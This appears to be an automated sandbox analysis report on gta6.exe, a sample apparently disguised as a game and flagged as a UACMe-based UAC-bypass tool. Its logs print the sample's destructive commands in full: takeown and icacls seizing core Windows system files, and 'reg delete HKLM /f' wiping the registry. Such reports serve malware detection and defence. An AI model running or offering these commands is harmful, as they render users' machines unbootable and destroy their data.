Windows Analysis Report
gta6.exe

Overview

General Information

Sample name: gta6.exe
Analysis ID: 1544786
MD5: aaff8d22681e8bdee3c3ba55007f673f
SHA1: aa94b52ee5290629165387bb0e7bdf3600e7a073
SHA256: 512b5deba1f1990f43876c48e0d8767f102cb7a0a949c6c9c6e079676bcd72eb
Tags: exeuser-MDMCk10
Infos:

Detection

UACMe
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected UACMe UAC Bypass tool
AI detected suspicious sample
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Recursive Takeown
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Name Description Attribution Blogpost URLs Link
UACMe A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: gta6.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: gta6.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.4% probability
Machine Learning detection for sample
Source: gta6.exe Joe Sandbox ML: detected

Exploits
barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: Process Memory Space: reg.exe PID: 6384, type: MEMORYSTR
Source: Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\ Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW, 0_2_000000014000B64C
Deletes files inside the Windows folder
Source: C:\Windows\System32\cmd.exe File deleted: C:\Windows\System32\drivers\DriverData Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001F888 0_2_000000014001F888
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_00000001400138E5 0_2_00000001400138E5
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_00000001400154F0 0_2_00000001400154F0
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140015160 0_2_0000000140015160
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140015170 0_2_0000000140015170
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140013175 0_2_0000000140013175
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140010210 0_2_0000000140010210
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140016210 0_2_0000000140016210
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000EA48 0_2_000000014000EA48
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001366E 0_2_000000014001366E
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000B758 0_2_000000014000B758
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_0000000140012FDD 0_2_0000000140012FDD
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .vbprojCx
Source: classification engine Classification label: mal72.expl.winEXE@46/2@0/0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Users\user\Desktop\gta6.exe File created: C:\Users\user\AppData\Local\Temp\278F.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Users\user\Desktop\gta6.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: gta6.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\gta6.exe "C:\Users\user\Desktop\gta6.exe"
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: C:\Users\user\Desktop\gta6.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.bat C:\Users\user\Desktop\gta6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C: Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete HKLM /f Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\takeown.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\gta6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: gta6.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: Binary string: AcroExch.PDBookmark]bS source: reg.exe, 00000020.00000003.1441099460.0000024D35084000.00000004.00000020.00020000.00000000.sdmp
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 0_2_000000014000D9C4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\gta6.exe Code function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Uses cacls to modify the permissions of files
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\regedit.exe Jump to behavior
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\ Jump to behavior
Source: C:\Windows\System32\icacls.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys
Source: C:\Windows\System32\takeown.exe File opened / queried: C:\Windows\System32\drivers\vmci.sys\ Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\gta6.exe Window / User API: threadDelayed 982 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\gta6.exe TID: 820 Thread sleep count: 982 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp\2791.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp\2790.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user\AppData\Local\Temp\278F.tmp Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\gta6.exe File opened: C:\Users\user~1\AppData\ Jump to behavior
Source: reg.exe, 00000020.00000003.1600455731.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: reg.exe, 00000020.00000003.1612618239.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1616503260.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1641852190.0000024D350CF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1594439512.0000024D350E1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1597565960.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1607595828.0000024D350CD000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598748911.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599138962.0000024D350DB000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1599859371.0000024D350C9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1598120945.0000024D350DF000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1601887206.0000024D350D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: reg.exe, 00000020.00000003.1600387159.0000024D35802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Resets/sec5084Page Table Validations/sec5086APIC TPR Accesses/sec5088Page Table Write Intercepts/sec5090Synthetic Interrupts/sec5092Virtual Interrupts/sec5094APIC IPIs Sent/sec5096APIC Self IPIs
Source: reg.exe, 00000020.00000003.1615168607.0000024D357B4000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000020.00000003.1610991428.0000024D3578A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: icacls.exe, 0000001E.00000002.1315865422.0000024753962000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ss.svmci.syswfplwfs.sys`
